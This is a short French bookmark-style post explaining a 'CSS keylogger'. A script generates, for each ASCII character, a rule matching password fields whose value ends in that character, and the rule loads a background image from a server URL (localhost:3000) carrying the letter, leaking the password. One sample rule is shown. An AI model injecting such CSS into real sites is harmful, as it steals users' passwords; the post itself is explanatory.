2340 shaares
1309 private links
1309 private links
Malin ! Un keylogger en CSS !
En fait un script génère pour tous les caractères ASCII, l'instruction CSS suivante :
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
Qui signifie que pour les champs de type password
dont la valeur se termine par a
, on va effectuer une requête externe vers un serveur avec la lettre a
. On fait ça pour tous les caractères et hop on a le mot de passe.